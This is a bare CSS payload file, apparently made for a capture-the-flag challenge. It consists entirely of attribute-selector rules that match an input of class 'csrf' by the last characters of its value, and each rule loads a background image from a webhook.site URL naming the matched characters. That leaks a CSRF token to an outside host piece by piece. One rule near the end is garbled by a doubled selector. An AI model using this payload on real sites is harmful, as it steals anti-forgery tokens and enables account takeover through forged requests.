input.csrf[value$='aU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=aU); }
input.csrf[value$='bU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=bU); }
input.csrf[value$='cU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=cU); }
input.csrf[value$='dU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=dU); }
input.csrf[value$='eU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=eU); }
input.csrf[value$='fU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=fU); }
input.csrf[value$='gU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=gU); }
input.csrf[value$='hU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=hU); }
input.csrf[value$='iU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=iU); }
input.csrf[value$='jU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=jU); }
input.csrf[value$='kU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=kU); }
input.csrf[value$='lU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=lU); }
input.csrf[value$='mU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=mU); }
input.csrf[value$='nU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=nU); }
input.csrf[value$='oU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=oU); }
input.csrf[value$='pU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=pU); }
input.csrf[value$='qU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=qU); }
input.csrf[value$='rU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=rU); }
input.csrf[value$='sU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=sU); }
input.csrf[value$='tU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=tU); }
input.csrf[value$='uU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=uU); }
input.csrf[value$='vU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=vU); }
input.csrf[value$='wU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=wU); }
input.csrf[value$='xU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=xU); }
input.csrf[value$='yU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=yU); }
input.csrf[value$='zU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=zU); }
input.csrf[value$='AU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=AU); }
input.csrf[value$='BU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=BU); }
input.csrf[value$='CU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=CU); }
input.csrf[value$='DU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=DU); }
input.csrf[value$='EU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=EU); }
input.csrf[value$='FU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=FU); }
input.csrf[value$='GU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=GU); }
input.csrf[value$='HU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=HU); }
input.csrf[value$='IU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=IU); }
input.csrf[value$='JU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=JU); }
input.csrf[value$='KU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=KU); }
input.csrf[value$='LU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=LU); }
input.csrf[value$='MU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=MU); }
input.csrf[value$='NU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=NU); }
input.csrf[value$='OU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=OU); }
input.csrf[value$='PU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=PU); }
input.csrf[value$='QU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=QU); }
input.csrf[value$='RU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=RU); }
input.csrf[value$='SU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=SU); }
input.csrf[value$='TU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=TU); }
input.csrf[value$='UU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=UU); }
input.csrf[value$='VU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=VU); }
input.csrf[value$='WU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=WU); }
input.csrf[value$='XU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=XU); }
input.csrf[value$='YU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=YU); }
input.csrf[value$='ZU'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=ZU); }
input.csrf[value$='!U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=!U); }
input.csrf[value$='"U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag="U); }
input.csrf[value$='#U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=#U); }
input.csrf[value$='$U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=$U); }
input.csrf[value$='%U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=%U); }
input.csrf[value$='&U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=&U); }
input.csrf[value$='\'U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=\'U); }
input.csrf[value$='(U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=(U); }
input.csrf[value$=')U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=)U); }
input.csrf[value$='*U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=*U); }
input.csrf[value$='+U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=+U); }
input.csrf[value$=',U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=,U); }
input.csrf[value$='-U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=-U); }
input.csrf[value$='.U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=.U); }
input.csrf[value$='/U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=/U); }
input.csrf[value$=':U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=:U); }
input.csrf[value$=';U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=;U); }
input.csrf[value$='input.csrf[value$='=U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag==U); }
input.csrf[value$='>U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=>U); }
input.csrf[value$='?U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=?U); }
input.csrf[value$='@U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=@U); }
input.csrf[value$='[U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=[U); }
input.csrf[value$='\U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=\U); }
input.csrf[value$=']U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=]U); }
input.csrf[value$='^U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=^U); }
input.csrf[value$='_U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=_U); }
input.csrf[value$='`U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=`U); }
input.csrf[value$='{U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag={U); }
input.csrf[value$='|U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=|U); }
input.csrf[value$='}U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=}U); }
input.csrf[value$='~U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag=~U); }
input.csrf[value$=' U'] { background:url(https://webhook.site/98121799-7cab-46a7-89a1-ca1a3642fc15/?flag= U); }
